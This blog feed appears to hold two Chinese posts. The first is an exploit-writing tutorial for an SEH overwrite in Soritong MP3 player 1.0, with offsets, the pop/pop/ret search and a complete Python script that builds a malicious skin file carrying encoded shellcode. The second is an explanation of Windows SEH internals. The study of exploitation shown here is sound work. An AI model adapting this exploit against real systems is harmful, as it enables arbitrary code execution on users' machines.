exploit编写笔记2——基于SEH的exploit2014-04-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/07/seh-exploit
<p>这是exploit编写的第二篇笔记,基于SEH的exploit。SEH的原理在之前的文章中已经做了详细说明,这里不再赘述。这次的例子是Soritong MP3 player 1.0上的漏洞,程序下载:<a href="/assets/file/seh-exploit/soritong10.exe">soritong10.exe</a>。</p>
<p>这个漏洞指出一个畸形皮肤文件将导致溢出,我们用python创建一个ui.txt文件并放到skin\default文件夹下面:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file = "ui.txt"
junk = "A" * 5000
f = open(file,'w')
f.write(junk)
f.close()
</code></pre></div></div>
<p>打开soritong mp3,可以看到无声崩溃掉,使用windbg查看seh的prev和handler都被我们的’A’覆盖了。</p>
<p><img src="/assets/img/sehexploit/1.png" alt="" /></p>
<p>当异常发生时,程序会跳转到SEH handler去执行,通过将这个handler的值设置为程序自带模块的一个pop/pop/ret地址,能够实现程序跳转到next seh pointer去,在next seh中需要做的就是跳转到shellcode执行。corelan的教程说的是造成一个二次异常,我觉得不是,就是简单的ret将next seh的值弹到了eip而已。shellcode的布局大致如下:</p>
<p>[junk][next seh][seh][shellcode]</p>
<p>next seh是一个跳转到shellcode的指令,seh是一个程序自带模块的p/p/r地址。</p>
<p>通过mona的pattern可以找到需要seh需要覆盖的偏移为588。一个short jmp机器码是eb,跟上跳转距离,跳过6字节的short jmp机器码为eb 06。所以使用0xeb,0x06,0x90,0x90覆盖 next seh。</p>
<p>查找pop pop ret指令</p>
<p><img src="/assets/img/sehexploit/2.png" alt="" /></p>
<p><img src="/assets/img/sehexploit/3.png" alt="" /></p>
<p>也就是说se handler在588个字节后被覆盖,next seh就在584个字节后被覆盖,</p>
<p>接着,我们找p/p/r地址</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000> lm
start end module name
00400000 004de000 SoriTong C (export symbols) C:\Program Files\SoriTong\SoriTong.exe
010d0000 0111f000 DRMClien (deferred)
10000000 10094000 Player (deferred)
42100000 42129000 wmaudsdk (deferred)
5adc0000 5adf7000 uxtheme (deferred)
5bd10000 5bd50000 strmdll (deferred)
5d170000 5d20a000 COMCTL32 (deferred)
62c20000 62c29000 LPK (deferred)
0:000> s 10000000 10094000 5f 5e c3
1000e0d2 5f 5e c3 8b 47 78 85 c0-75 05 33 c0 5f 5e c3 8b _^..Gx..u.3._^..
1000e0de 5f 5e c3 8b 07 8b cf ff-10 8b f0 85 f6 7c 07 8b _^...........|..
1000e0f6 5f 5e c3 cc cc cc cc cc-cc cc 53 56 57 8b f1 55 _^........SVW..U
100106fb 5f 5e c3 cc cc 8b 44 24-08 8b 54 24 04 50 8b 49 _^....D$..T$.P.I
10010cab 5f 5e c3 cc cc 41 e8 6a-fe ff ff a8 01 74 05 d1 _^...A.j.....t..
100116fd 5f 5e c3 56 8b f1 8d 89-1c 8a 04 00 e8 82 74 ff _^.V..........t.
1001263d 5f 5e c3 55 8b ec 57 56-8b 75 0c 8b 7d 08 8b 4d _^.U..WV.u..}..M
100127f8 5f 5e c3 cc cc cc cc cc-8b 44 24 04 56 57 8b d0 _^.......D$.VW..
1001281f 5f 5e c3 cc cc cc cc cc-cc cc cc cc cc cc cc cc _^..............
10012984 5f 5e c3 cc cc cc cc cc-cc cc cc cc 8b 44 24 04 _^...........D$.
...
</code></pre></div></div>
<p>我们随便选一个如10012984.</p>
<p>这里再解释一下pop pop ret指令的作用,当异常发生的时候,异常分发器创建自己的栈帧,会奖EH handler成员压入新创的栈帧中,在EH结构中有一个域是EstablisherFrame。这个域指向异常注册记录(next seh)的地址并被压入栈中,当一个函数被调用的时候被压入的这个值都是位于ESP+8的地方。使用pop pop ret后,就会将next seh的地址放到EIP中。</p>
<p>最终的shellcode就是</p>
<p>junk:584字节 ‘A’</p>
<p>next seh:”\xeb\x06\x90\x90”</p>
<p>seh:”\x84\x29\x01\x10”</p>
<p>shellcode:完成功能的,随便找了一个弹计算器的</p>
<p>并且在最后加了一些垃圾数据</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name = "ui.txt"
data = "A" * 584
nextseh = "\xeb\x06\x90\x90"
seh = "\xe8\x8d\x01\x10"
shellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x46\x42\x50\x5a")
junk2="\x90" * 1000;
data = data + nextseh + seh + shellcode + junk2
f = open(name,'w')
f.write(data)
f.close()
</code></pre></div></div>
<p>将ui.txt文件放在skin/default里面,再点击原程序,发现弹出了计算器。</p>
Windows用户态异常处理2014-03-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/31/windows-user-exception
<ul>
<li><a href="#第一节">Windows异常的分发</a></li>
<li><a href="#第二节">OS提供的SEH机制</a></li>
<li><a href="#第三节">编译器层面的SEH</a></li>
<li><a href="#第四节">展开</a></li>
</ul>
<p>已经有太多的文章对Windows异常处理进行了讨论,我这里也是在前人的基础上总结一下,自己做个记录。为了便于理解,我准备从异常发生的那一刻到执行我们自己定义的异常处理函数进行一个梳理。</p>
<h3 id="第一节">一. Windows异常的分发</h3>
<p>在保护模式下,当有中断或异常发生时,CPU是通过IDT进入内核来寻找处理函数的,比如我们在执行一个除0操作,就会使得CPU的执行转到IDT第一项所注册的地址(nt!KiTrap00)。或者我们试图访问一个不存在的内存页会使流程转到nt!KiTrap0E。使用windbg查看idt,如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> !idt -a
Dumping IDT: 8003f400
9d120e4800000000: 804e0360 nt!KiTrap00
9d120e4800000001: 804e04db nt!KiTrap01
9d120e4800000002: Task Selector = 0x0058
9d120e4800000003: 804e08ad nt!KiTrap03
9d120e4800000004: 804e0a30 nt!KiTrap04
9d120e4800000005: 804e0b91 nt!KiTrap05
9d120e4800000006: 804e0d12 nt!KiTrap06
9d120e4800000007: 804e137a nt!KiTrap07
9d120e4800000008: Task Selector = 0x0050
9d120e4800000009: 804e179f nt!KiTrap09
9d120e480000000a: 804e18bc nt!KiTrap0A
9d120e480000000b: 804e19f9 nt!KiTrap0B
9d120e480000000c: 804e1c52 nt!KiTrap0C
9d120e480000000d: 804e1f48 nt!KiTrap0D
</code></pre></div></div>
<p>KiTrap00函数通常只是对异常作简单的表征和描述,为了支持调试和软件自己定义的异常处理函数,系统需要将异常分发给调试器或应用程序的处理函数。对于软件异常,Windows系统采用的策略是以和CPU异常统一的方式来分发和处理的,处理的关键函数是nt!KiDispatchException。</p>
<p><img src="/assets/img/exception/1.png" alt="" /></p>
<p>KiDispatchException原型如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VOID KiDispatchException(IN PEXCEPTION_RECORD ExceptionRecord,
IN PKEXCEPTION_FRAME ExceptionFrame,
IN PKTRAP_FRAME TrapFrame,
IN KPROCESSOR_MODE PreviousMode,
IN BOOLEAN FirstChance
)
</code></pre></div></div>
<p>ExceptionRecord用来描述异常,定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct _EXCEPTION_RECORD {
NTSTATUS ExceptionCode;
ULONG ExceptionFlags;
struct _EXCEPTION_RECORD *ExceptionRecord;
PVOID ExceptionAddress;
ULONG NumberParameters;
ULONG_PTR ExceptionInformatio[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;
</code></pre></div></div>
<p>ExceptionFrame对于x86结构总是NULL,参数TrapFrame用来描述异常发生时的处理器状态,包括各种通用寄存器、调试寄存器、段寄存器等。定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct _KTRAP_FRAME {
ULONG DbgEbp;
ULONG DbgEip;
ULONG DbgArgMark;
ULONG DbgArgPointer;
ULONG TempSegCs;
ULONG TempEsp;
ULONG Dr0;
ULONG Dr1;
ULONG Dr2;
ULONG Dr3;
ULONG Dr6;
ULONG Dr7;
ULONG SegGs;
ULONG SegEs;
ULONG SegDs;
ULONG Edx;
ULONG Ecx;
ULONG Eax;
ULONG PreviousPreviousMode;
PEXCEPTION_REGISTRATION_RECORD ExceptionList;
ULONG SegFs;
ULONG Edi;
ULONG Esi;
ULONG Ebx;
ULONG Ebp;
ULONG ErrCode;
ULONG Eip;
ULONG SegCs;
ULONG EFlags;
ULONG HardwareEsp;
ULONG HardwareSegSs;
ULONG V86Es;
ULONG V86Ds;
ULONG V86Fs;
ULONG V86Gs;
} KTRAP_FRAME;
</code></pre></div></div>
<p>PreviousMode是一个枚举类型,表示出发异常代码的执行模式是用户模式还是内核模式。FirstChance参数表示是否是第一轮分发这个异常。对于一个异常,Windows系统会最多分发两轮。图2画出了KiDispatchException分发异常的基本过程。</p>
<p><img src="/assets/img/exception/2.png" alt="" /></p>
<p>这里我们只关注用户态异常并且调试器没有处理该异常的的情况。KiDispatchException将CONTEXT和EXCEPTION_RECORD结构复制到用户态栈中,之后会将内核变量KeUserExceptionDispatcher赋予KTRAP_FRAME中的eip,这个值是KiUserExceptionDispatcher函数。之后执行iret指令返回用户空间。我们在windbg中看到:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dd KeUserExceptionDispatcher
8055b310 7c92e47c 7c92e460 7c92e450 0002625a
8055b320 00000000 00000000 00000000 00000000
</code></pre></div></div>
<p>可以看到KeUserExceptionDispatcher的值为0x7c92e47c,这与OD看到的吻合。</p>
<p>回到用户态后,KiUserException会通过调用RtlDispatchException来寻找异常处理器。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> KiUserExceptionDispatcher( PEXCEPTION_RECORD pExcptRec, CONTEXT *pContext )
{
DWORD retValue;
// Note: If the exception is handled, RtlDispatchException() never returns
if ( RtlDispatchException( pExceptRec, pContext ) )
retValue = NtContinue( pContext, 0 );
else
retValue = NtRaiseException( pExceptRec, pContext, 0 );
EXCEPTION_RECORD excptRec2;
excptRec2.ExceptionCode = retValue;
excptRec2.ExceptionFlags = EXCEPTION_NONCONTINUABLE;
excptRec2.ExceptionRecord = pExcptRec;
excptRec2.NumberParameters = 0;
RtlRaiseException( &excptRec2 );
} RtlDispatchException函数的工作就是找到注册在线程信息快(TIB)中异常处理器链表的头结点,然后依次访问每个节点,调用它的处理器函数,直到有人处理了异常,或者到了链表的末尾。这个时候SEH机制就上场了。
</code></pre></div></div>
<h3 id="第二节">二. OS提供的SEH机制</h3>
<p>RtlDispatchException调用用户层注册的异常处理函数,这个回调函数的原型如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EXCEPTION_DISPOSITION
__cdecl _except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext
);
</code></pre></div></div>
<p>这些参数中ExceptionRecord和ContextRecord是从内核态复制到用户态栈中的,EstablisherFrame是建立(登记)异常处理函数的那个函数栈帧,DispatcherContext是个指针,仅用于嵌套异常的临时保护节点有效。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef enum _EXCEPTION_DISPOSITION {
ExceptionContinueExecution,
ExceptionContinueSearch,
ExceptionNestedException,
ExceptionCollidedUnwind
} EXCEPTION_DISPOSITION; os会根据hander返回值来决定下一步操作。
</code></pre></div></div>
<p>这回快涉及到编译器的SEH支持了,我还是先来说说OS的机制,刚才说到RtlDispatchException通过TIB找到异常处理器的头节点,这是通过fs:[0]实现的,fs总是指向当前线程的TEB结构,TIB位于TEB起始处。我们先看看TIB结构:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dt ntdll!_NT_TIB
+0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 StackBase : Ptr32 Void
+0x008 StackLimit : Ptr32 Void
+0x00c SubSystemTib : Ptr32 Void
+0x010 FiberData : Ptr32 Void
+0x010 Version : Uint4B
+0x014 ArbitraryUserPointer : Ptr32 Void
+0x018 Self : Ptr32 _NT_TIB
</code></pre></div></div>
<p>我们看到第一个结构式_EXCEPTION_REGISTRATION_RECORD</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd> dt ntdll!_EXCEPTION_REGISTRATION_RECORD
+0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Handler : Ptr32 _EXCEPTION_DISPOSITION
</code></pre></div></div>
<p>第一部分是下一个_EXCEPTION_REGISTRATION_RECORD结构地址,第二部分是一个异常处理函数。</p>
<p>现在我们简单总结一下,在执行用户注册的异常处理函数的步骤是:当异常发生后,返回用户态RtlDispatchException查找用户态注册的异常处理器时,首先通过fs:[0]得到ExceptionList字段,遍历这个链表以便查找其中的一个EXCEPTION_REGISTRATION 结构,其例程回调(异常处理程序)同意处理该异常。在 MYSEH.CPP 的例子中,异常处理程序通过返回ExceptionContinueExecution 表示它同意处理这个异常。异常回调函数也可以拒绝处理这个异常。在这种情况下,系统移向链表的下一个EXCEPTION_REGISTRATION 结构并询问它的异常回调函数,看它是否愿意处理这个异常。图3显示了这个过程</p>
<p><img src="/assets/img/exception/3.png" alt="" /></p>
<p>我们给个例子手工编写代码来登记和注销异常处理函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include "stdafx.h"
//==================================================
// MYSEH - Matt Pietrek 1997
// Microsoft Systems Journal, January 1997
// FILE: MYSEH.CPP
// To compile: CL MYSEH.CPP
//==================================================
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
DWORD scratch;
EXCEPTION_DISPOSITION
__cdecl
_except_handler(
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext )
{
unsigned i;
// Indicate that we made it to our exception handler
printf( "Hello from an exception handler/n" );
// Change EAX in the context record so that it points to someplace
// where we can successfully write
ContextRecord->Eax = (DWORD)&scratch;
// Tell the OS to restart the faulting instruction
return ExceptionContinueExecution;
}
int main()
{
DWORD handler = (DWORD)_except_handler;
__asm
{
// 创建 EXCEPTION_REGISTRATION 结构:
push handler // handler函数的地址
push FS:[0] // 前一个handler函数的地址
mov FS:[0],ESP // 装入新的EXECEPTION_REGISTRATION结构
}
__asm
{
mov eax,0 // EAX清零
mov [eax], 1 // 写EAX指向的内存从而故意引发一个错误
}
printf( "After writing!/n" );
__asm
{
// 移去我们的 EXECEPTION_REGISTRATION 结构记录
mov eax,[ESP] // 获取前一个结构
mov FS:[0], EAX // 装入前一个结构
add esp, 8 // 将 EXECEPTION_REGISTRATION 弹出堆栈
}
return 0;
}
</code></pre></div></div>
<p>代码不必赘言,就是我们手工压入一个处理函数,然后出发一个异常,流程进入我们的处理器,处理之后继续回到原来的流程。</p>
<p>刚刚我们看到的就是操作系统对SEH的支持,介绍这个事为了说明登记和注销SEH处理器的基本原理。很明显,我们自己写windows程序的时候如果这样写就比较麻烦了:第一,需要自己编写符合SehHandler函数原型的处理函数;第二,要直接操作栈指针。平时我们都是直接使用__try{} __excpet()就简单的完成了异常函数的注册。这就是编译器对SEH的支持了。</p>
<h3 id="第三节">三. 编译器层面的SEH</h3>
<p>我们使用一个例子来看看编译器层面的SEH,例子程序下载:<a href="/assets/file/exception/sehtes.cpp">sehtes.cpp</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1 119: int main()
2 120: {
3 00401280 push ebp
4 00401281 mov ebp,esp
5 00401283 push 0FFh
6 00401285 push offset string "Caught Exception in main\n"+24h (00422130)
7 0040128A push offset __except_handler3 (00401430)
8 0040128F mov eax,fs:[00000000]
9 00401295 push eax
10 00401296 mov dword ptr fs:[0],esp
11 0040129D add esp,0B4h
12 004012A0 push ebx
13 004012A1 push esi
14 004012A2 push edi
15 004012A3 mov dword ptr [ebp-18h],esp
16 004012A6 lea edi,[ebp-5Ch]
17 004012A9 mov ecx,11h
18 004012AE mov eax,0CCCCCCCCh
19 004012B3 rep stos dword ptr [edi]
20 121: int i;
21 122: // 使用两个__try块(并不嵌套),这导致为scopetable数组生成两个元素
22 123: __try
23 004012B5 mov dword ptr [ebp-4],0
24 124: {
25 125: i = 0x1234;
26 004012BC mov dword ptr [ebp-1Ch],1234h
27 126:
28 127: } __except( EXCEPTION_EXECUTE_HANDLER )
29 004012C3 mov dword ptr [ebp-4],0FFFFFFFFh
30 004012CA jmp $L17074+17h (004012e9)
31 $L17073:
32 004012CC mov eax,1
33 $L17075:
34 004012D1 ret
35 $L17074:
36 004012D2 mov esp,dword ptr [ebp-18h]
37 128: {
38 129: printf("div0 occur!\n");
39 004012D5 push offset string "div0 occur!\n" (004230c4)
40 004012DA call printf (00401370)
41 004012DF add esp,4
42 130: }
43 004012E2 mov dword ptr [ebp-4],0FFFFFFFFh
44 131: __try
45 004012E9 mov dword ptr [ebp-4],1
46 132: {
47 133: Function1(); // 调用一个设置更多异常帧的函数
48 004012F0 call @ILT+15(Function1) (00401014)
49 134: } __except( EXCEPTION_EXECUTE_HANDLER )
50 004012F5 mov dword ptr [ebp-4],0FFFFFFFFh
51 004012FC jmp $L17078+17h (0040131b)
52 $L17077:
53 004012FE mov eax,1
54 $L17079:
55 00401303 ret
56 $L17078:
57 00401304 mov esp,dword ptr [ebp-18h]
58 135: {
59 136: // 应该永远不会执行到这里,因为我们并没有打算产生任何异常
60 137: printf( "Caught Exception in main\n" );
61 00401307 push offset string "Caught Exception in main\n" (0042210c)
62 0040130C call printf (00401370)
63 00401311 add esp,4
64 138: }
65 00401314 mov dword ptr [ebp-4],0FFFFFFFFh
66 139: return 0;
67 0040131B xor eax,eax
68 140: }
69 0040131D mov ecx,dword ptr [ebp-10h]
70 00401320 mov dword ptr fs:[0],ecx
71 00401327 pop edi
72 00401328 pop esi
73 00401329 pop ebx
74 0040132A add esp,5Ch
75 0040132D cmp ebp,esp
76 0040132F call __chkesp (004013f0)
77 00401334 mov esp,ebp
78 00401336 pop ebp
79 00401337 ret
80
81
82 99: void Function1( void )
83 100: {
84 004011A0 push ebp
85 004011A1 mov ebp,esp
86 004011A3 push 0FFh
87 004011A5 push offset string "_except_handler3 is at address: "...+30h (004220e0)
88 004011AA push offset __except_handler3 (00401430)
89 004011AF mov eax,fs:[00000000]
90 004011B5 push eax
91 004011B6 mov dword ptr fs:[0],esp
92 004011BD add esp,0B4h
93 004011C0 push ebx
94 004011C1 push esi
95 004011C2 push edi
96 004011C3 mov dword ptr [ebp-18h],esp
97 004011C6 lea edi,[ebp-5Ch]
98 004011C9 mov ecx,11h
99 004011CE mov eax,0CCCCCCCCh
100 004011D3 rep stos dword ptr [edi]
101 101: int i;
102 102: // 嵌套3层__try块以便强制为scopetable数组产生3个元素
103 103: __try
104 004011D5 mov dword ptr [ebp-4],0
105 104: {
106 105: __try
107 004011DC mov dword ptr [ebp-4],1
108 106: {
109 107: __try
110 004011E3 mov dword ptr [ebp-4],2
111 108: {
112 109: i = i/0;
113 004011EA mov eax,dword ptr [ebp-1Ch]
114 004011ED cdq
115 0
</code></pre></div></div>
<p>第5~10行是在登记异常处理器,与我们手工编写有所不同。</p>
<p>第一,使用__except_handler3作为异常处理函数。编译器编译__try{}__except{}结构时总是使用统一的函数将其登记为异常处理函数,并不是为每段使用SEH的代码生成单独处理函数。不同编译器使用的异常处理函数可能不同,这里使用的VC6编译器的__except_handler3。异常处理函数是由系统异常分发函数来调用的,即RtlDispatchException>ExecuteHandler>ExecuteHandler2>__except_handler3,而且这些参数的个数是固定的。这意味着要增加新的参数是不可行的,解决办法只能扩展现有参数,通过类型转换将简单的类型转变为包含扩展字段的复杂类型,这正是VC所采用的方案。就是下面的第二点差异。</p>
<p>第二,在栈上准备EXCEPTION_REGISTRATION_RECORD前(7~9行),编译器产生的代码会先压入一个被称为trylevel的整数(第5行)和一个指向scopetable_entry结构的scopetable指针(第6行),这样在栈上世纪形成了如下的_EXCEPTION_REGISTRATION结构。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct _EXCEPTION_REGISTRATION{
struct _EXCEPTION_REGISTRATION *prev;
void (*handler)(PEXCEPTION_RECORD,PEXCEPTION_REGISTRATION,PCONTEXT,PEXCEPTION_RECORD);
struct scopetable_entry *scopetable;
int trylevel;
int _ebp;
}
</code></pre></div></div>
<p>下面分别介绍几个字段的作用。</p>
<p>1.scopetable</p>
<p>这个指针指向一个数组,数组的每个元素是一个scopetable_entry结构,用来描述一个__try{}__except结构。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct scopetable_entry
{
DWORD previousTryLevel;
FARPROC lpfnFilter;
FARPROC lpfnHandler;
}
</code></pre></div></div>
<p>其中lpfnFilter和lpfnHandler分别用来描述__try{}__except结构的过滤表达式和异常处理块的起始地址。还是以上面的例子看看</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00422130 FF FF FF FF CC 12 40 00 D2 12 40 00 FF FF FF FF ......@...@.....
00422140 FE 12 40 00 04 13 40 00
</code></pre></div></div>
<p>一个函数注册一个_EXCEPTION_REGISTRATION,每个try except对应scopetable中的一个元素。
这个例子中,main函数中有2个try,所以有2个元素,第一个FFFFFFFF表示其不在任何__try结构中,004012CC是第一个__try的过滤函数,004012D2表示第一个__try的处理函数。</p>
<p>2.trylevel</p>
<p>trylevel表示的是scopetable对应的索引。在main最开始的时候是-1,表示不属于任何try结构,当进入第一个try结构中,设置这个变量为0(第23行),表示如果发生异常,就要去找scopetable中的第一个元素,离开第一个try之后,我们又将其设置为-1(第43行)。</p>
<p>为了对scopetable和trylevel,我们队Function1进行升入考察,其scopetable如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>004220E0 FF FF FF FF 2F 12 40 00 32 12 40 00 00 00 00 00 ..../.@.2.@.....
004220F0 19 12 40 00 1C 12 40 00 01 00 00 00 03 12 40 00 ..@...@.......@.
00422100 06 12 40 00
</code></pre></div></div>
<p>这个scopetable共有3个元素,第一个的previousTrylevel为-1,说明其不再任何try块中,第二个元素的previousTrylevel为0,说明其在第0个scopetable元素的内部,第三个类似,我们从104~110行能够看到每次进入一个try块就会设置trylevel。</p>
<p>我们先看看__except_handler3的伪代码,然后再总结一下其运行过程:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __except_handler3(
struct _EXCEPTION_RECORD * pExceptionRecord,
struct EXCEPTION_REGISTRATION * pRegistrationFrame,
struct _CONTEXT *pContextRecord,
void * pDispatcherContext )
{
LONG filterFuncRet;
LONG trylevel;
EXCEPTION_POINTERS exceptPtrs;
PSCOPETABLE pScopeTable;
CLD // 将方向标志复位(不测试任何条件!)
// 如果没有设置EXCEPTION_UNWINDING标志或EXCEPTION_EXIT_UNWIND标志
// 表明这是第一次调用这个处理程序(也就是说,并非处于异常展开阶段)
if ( ! (pExceptionRecord->ExceptionFlags
& (EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND)) )
{
// 在堆栈上创建一个EXCEPTION_POINTERS结构
exceptPtrs.ExceptionRecord = pExceptionRecord;
exceptPtrs.ContextRecord = pContextRecord;
// 把前面定义的EXCEPTION_POINTERS结构的地址放在比
// establisher栈帧低4个字节的位置上。参考前面我讲
// 的编译器为GetExceptionInformation生成的汇编代
// 码*(PDWORD)((PBYTE)pRegistrationFrame - 4) = &exceptPtrs;
// 获取初始的“trylevel”值
trylevel = pRegistrationFrame->trylevel;
// 获取指向scopetable数组的指针
scopeTable = pRegistrationFrame->scopetable;
search_for_handler:
if ( pRegistrationFrame->trylevel != TRYLEVEL_NONE )
{
if ( pRegistrationFrame->scopetable[trylevel].lpfnFilter )
{
PUSH EBP // 保存这个栈帧指针
// !!!非常重要!!!切换回原来的EBP。正是这个操作才使得
// 栈帧上的所有局部变量能够在异常发生后仍然保持它的值不变。
EBP = &pRegistrationFrame->_ebp;
// 调用过滤器函数
filterFuncRet = scopetable[trylevel].lpfnFilter();
POP EBP // 恢复异常处理程序的栈帧指针
if ( filterFuncRet != EXCEPTION_CONTINUE_SEARCH )
{
if ( filterFuncRet < 0 ) // EXCEPTION_CONTINUE_EXECUTION
return ExceptionContinueExecution;
// 如果能够执行到这里,说明返回值为EXCEPTION_EXECUTE_HANDLER
scopetable = pRegistrationFrame->scopetable;
// 让操作系统清理已经注册的栈帧,这会使本函数被递归调用
__global_unwind2( pRegistrationFrame );
// 一旦执行到这里,除最后一个栈帧外,所有的栈帧已经
// 被清理完毕,流程要从最后一个栈帧继续执行
EBP = &pRegistrationFrame->_ebp;
__local_unwind2( pRegistrationFrame, trylevel );
// NLG = "non-local-goto" (setjmp/longjmp stuff)
__NLG_Notify( 1 ); // EAX = scopetable->lpfnHandler
// 把当前的trylevel设置成当找到一个异常处理程序时
// SCOPETABLE中当前正在被使用的那一个元素的内容
pRegistrationFrame->trylevel = scopetable->previousTryLevel;
// 调用__except {}块,这个调用并不会返回
pRegistrationFrame->scopetable[trylevel].lpfnHandler();
}
}
scopeTable = pRegistrationFrame->scopetable;
trylevel = scopeTable->previousTryLevel;
goto search_for_handler;
}
else // trylevel == TRYLEVEL_NONE
{
return ExceptionContinueSearch;
}
}
else // 设置了EXCEPTION_UNWINDING标志或EXCEPTION_EXIT_UNWIND标志
{
PUSH EBP // 保存EBP
EBP = &pRegistrationFrame->_ebp; // 为调用__local_unwind2设置EBP
__local_unwind2( pRegistrationFrame, TRYLEVEL_NONE )
POP EBP // 恢复EBP
return ExceptionContinueSearch;
}
}
</code></pre></div></div>
<p>__except_handler3函数执行的操作主要有:</p>
<p>1.将第二个参数pRegistrationRecord从系统默认的EXCEPTION_REGISTRATION_RECORD结构强制转化为包含扩展字段的_EXCEPTION_REGISTRATION结构。</p>
<p>2.先从pRegistrationRecord结构中取出trylevel字段的值并且赋给一个局部变量nTrylevel,然后根据nTrylevel的值从scopetable字段所指定的数组中找到一个scopetable_entry结构。</p>
<p>3.从scopetable_entry结构中取出lpfnFilter字段,如果不为空,则调用这个函数,即评估过滤表达式,如果为空,则跳到第五步。</p>
<p>4.如果lpfnFilter函数返回值不等于EXCEPTION_CONTINUE_SEARCH,则准备执行lpfnHandler字段做指定的函数,并且不再返回。如果过滤表达式返回的是EXCEPTION_CONTINUE_SEARCH,则自然进入(Fall Through)到第五步。</p>
<p>5.判断scopetable_entry结构的previousTrylevel字段值,如果它不等于-1,则将previousTrylevel赋给nTrylevel并返回到第二步继续循环。如果previousTrylevel等于-1,那么继续到第六步。</p>
<p>6.返回DISPOSITION_CONTINUE_SEARCH,让系统(RtlDispatchException)继续寻找其他异常处理器。</p>
<p>__except_handler3是如何做到既通过CALL指令调用__except块而又不让执行流程返回呢?由于CALL指令要向堆栈中压入了一个返回地址,你可以想象这有可能破坏堆栈。如果你检查一下编译器为__except块生成的代码,你会发现它做的第一件事就是将EXCEPTION_REGISTRATION结构下面8个字节处(即[EBP-18H]处)的一个DWORD值加载到ESP寄存器中(实际代码为MOV ESP,DWORD PTR [EBP-18H]),这个值是在函数的 prolog 代码中被保存在这个位置的(实际代码为MOV DWORD PTR [EBP-18H],ESP)。</p>
<p>上述过程省略了全局展开和局部展开,我们在下一节专门讨论。</p>
<h3 id="第四节">四. 展开</h3>
